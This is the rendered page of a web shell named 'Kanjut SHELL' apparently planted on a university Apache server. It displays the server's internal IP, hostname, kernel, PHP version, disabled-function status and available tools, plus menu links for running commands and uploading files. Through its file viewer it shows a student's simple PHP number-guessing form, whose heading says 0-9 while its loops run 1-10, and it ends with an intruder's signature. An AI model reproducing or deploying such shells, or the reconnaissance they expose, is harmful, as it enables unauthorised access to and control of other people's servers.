Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 52.15.185.147
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/tafletcher/public_html/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/tafletcher/public_html/guess.php
<!--
	p.56
	Pick two numbers
-->

<Center>
<Body bgcolor=black>
<FONT size=4 color=orange>

<H2>
Guess Two Numbers
(0-9)
</H2>
<hr>

<FORM action=result.php method=post>
<p>
Pick the first number -
<p>
<?php
	for($i=1; $i<=10; $i++)
		print "<input type=radio name=pick1 value=$i>$i";
?>
<p>
Pick the second number -
<p>
<?php
	for($i=1; $i<=10; $i++)
		Print "<input type=radio name=pick2 value=$i>$i";
?>
<p>
<input type=submit name=submit>
<input type=reset name=cancle>
<p>
<a href = index.html> Home </a>
</FORM>
</Center>

Stv3n404 - 2023